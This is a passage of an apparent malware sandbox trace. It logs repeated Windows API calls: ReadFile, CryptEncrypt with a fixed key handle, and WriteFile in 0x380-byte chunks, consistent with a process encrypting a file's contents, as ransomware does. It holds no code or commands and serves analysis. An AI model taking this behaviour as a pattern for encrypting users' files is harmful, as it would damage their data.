pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.872] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.872] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.872] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.872] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.872] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.872] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.872] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.872] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.872] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.873] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.873] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.873] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.873] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.873] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.873] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.873] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.873] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.873] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.873] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.873] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.873] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.873] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.873] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.874] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.874] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.874] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.874] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.874] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.874] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.874] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.874] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.874] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.875] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.875] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.875] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.875] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.875] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.875] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.875] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.875] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.875] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.875] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.875] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.875] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.875] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.875] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.876] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.876] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.876] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.876] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.876] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.876] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.876] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.876] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.876] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.876] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.876] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.876] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.876] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.876] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.877] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.877] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.877] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.877] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.877] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.877] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.877] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.877] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.877] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.877] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.877] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.877] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.877] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.877] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.878] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.878] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.878] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.878] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.878] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.878] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.878] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.878] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.878] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.878] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.878] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.878] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.878] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.878] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.879] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.879] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.879] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.879] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.879] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.879] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.879] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.879] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.879] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.879] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.879] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.879] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.879] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.880] CryptEncrypt (in: hKey=0x2fa508, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d204*=0x380) returned 1 [0269.880] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9d204, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9d204*=0x380, lpOverlapped=0x0) returned 1 [0269.880] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, 